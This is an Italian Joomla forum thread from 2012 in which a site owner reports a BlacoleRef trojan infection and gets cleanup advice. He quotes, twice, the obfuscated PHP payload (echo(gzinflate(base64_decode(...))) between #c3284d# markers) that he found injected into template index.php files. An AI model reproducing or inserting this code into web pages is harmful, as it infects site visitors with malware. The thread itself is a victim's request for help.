Back to top

Autore Topic: URGENTE Joomla 1.5.26 Trojan:JS/BlacoleRef.W  (Letto 4306 volte)

Offline negiot

  • Nuovo arrivato
  • *
  • Post: 7
    • Mostra profilo
URGENTE Joomla 1.5.26 Trojan:JS/BlacoleRef.W
« il: 01 Giu 2012, 23:12:03 »
Ciao, ho trovato il mio sito collassato... ie mi segnalava :

  • ...\Content.IE5\30UKLEEX\jquerymini[1].js
  • Microsoft Malware Protection Center segnalava Trojan:JS/BlacoleRef.W
Ho trovato nella webroot del sito

il file /tmp/jquerymini.js   e nel nel file /templates/rt_terrantribune_j15/index.php  o index del vostro template, troverete il seguente codice:
Codice: [Seleziona]
#c3284d#
echo(gzinflate(base64_decode("TcxbCsMgEEbhrYjvKuQCpSTZy0QkGVFjM7+l2X0Leenrd+BM4k+uULhqmDXCBy7Sm27VKlHZGm2/9K9y+lnvQH06tx+CfjDd2BkBgb0devMYzWrXJlyCiEVIwR+ZQYnJMhxydfHVwnllLmyjaLVM7r4vXw==")));
#/c3284d#


Eliminate file e codice... qualcuno conosce il FIX ? grazie ngt
« Ultima modifica: 01 Giu 2012, 23:14:05 da negiot »

vamba

  • Visitatore
Re:URGENTE Joomla 1.5.26 Trojan:JS/BlacoleRef.W
« Risposta #1 il: 01 Giu 2012, 23:21:36 »
Il problema non è joomla ma risiede nel template.

Dato che il template è commerciale ti consiglierei di contattare il template Club dove hai l'iscrizione in quanto pagando l'iscrizione stessa hai pure il supporto.

Però .... dato che molti template commerciali si trovano in download nei canali warez ci terrei a specificare che l'utilizzo senza essere iscritti per prima cosa non è contemplato dalla licenza e seconda cosa, spesso, i template che gravitano nei canali warez sono strapieni di backdoor e ammennioli vari.

Offline negiot

  • Nuovo arrivato
  • *
  • Post: 7
    • Mostra profilo
Re:URGENTE Joomla 1.5.26 Trojan:JS/BlacoleRef.W
« Risposta #2 il: 01 Giu 2012, 23:50:09 »
cmq il template nn e' warez.

vamba

  • Visitatore
Re:URGENTE Joomla 1.5.26 Trojan:JS/BlacoleRef.W
« Risposta #3 il: 01 Giu 2012, 23:56:28 »
Citazione
cmq il template nn e' warez.
Ottimo ... allora contatta il Template Club per segnalare che distribuiscono a pagamento un template che potrebbe avere seri problemi di sicurezza e richiedi ugentemente assistenza dato che paghi, oltre al template in se, anche per l'assistenza post vendita.

Offline negiot

  • Nuovo arrivato
  • *
  • Post: 7
    • Mostra profilo
Re:URGENTE Joomla 1.5.26 Trojan:JS/BlacoleRef.W
« Risposta #4 il: 02 Giu 2012, 00:04:03 »
ok grazie

Offline negiot

  • Nuovo arrivato
  • *
  • Post: 7
    • Mostra profilo
Re:URGENTE Joomla 1.5.26 Trojan:JS/BlacoleRef.W
« Risposta #5 il: 02 Giu 2012, 00:43:21 »
ehmmm ho trovato

in /template/system/index.php

il seguente codice:

Codice: [Seleziona]
<?php
include dirname(__FILE__).DIRECTORY_SEPARATOR.'component.php';

#c3284d#
echo(gzinflate(base64_decode("TcxbCsMgEEbhrYjvKuQCpSTZy0QkGVFjM7+l2X0Leenrd+BM4k+uULhqmDXCBy7Sm27VKlHZGm2/9K9y+lnvQH06tx+CfjDd2BkBgb0devMYzWrXJlyCiEVIwR+ZQYnJMhxydfHVwnllLmyjaLVM7r4vXw==")));
#/c3284d#
?>

tutti gli index.php di tutti template anche quelli standard sono infetti...

Offline negiot

  • Nuovo arrivato
  • *
  • Post: 7
    • Mostra profilo
Re:URGENTE Joomla 1.5.26 Trojan:JS/BlacoleRef.W
« Risposta #6 il: 02 Giu 2012, 00:53:13 »
penso che il bug sia legato a com_gcalendar...

Offline Npaquito

  • Abituale
  • ****
  • Post: 1832
    • Mostra profilo
Re:URGENTE Joomla 1.5.26 Trojan:JS/BlacoleRef.W
« Risposta #7 il: 02 Giu 2012, 08:12:18 »
Hola

In questo forum non si fornisce supporto a estensioni commerciali
web design, web mobile

vamba

  • Visitatore
Re:URGENTE Joomla 1.5.26 Trojan:JS/BlacoleRef.W
« Risposta #8 il: 02 Giu 2012, 17:04:50 »
Citazione
tutti gli index.php di tutti template anche quelli standard sono infetti...
Controlla tutte le estensioni che hai aggiunto, escludendo quelle di default di joomla, e verifica che siano aggiornate all'ultima versione.
L'inclusione del codice in tutti i file index avviene propio a causa di una falla di sicurezza e per scoprire quale sia la causa si deve necessariamente capire quali siano le estensioni aggiunte.

In partticolari casi, però, può accadere che il veicoco che permette di caricare software malevolo simo proprio noi, o meglio il nostro pc quindi è sempre meglio scansionare il nostro computer prima di caricare qualcosa sia via ftp che con caricamento normale.

 



Web Design Bolzano Kreatif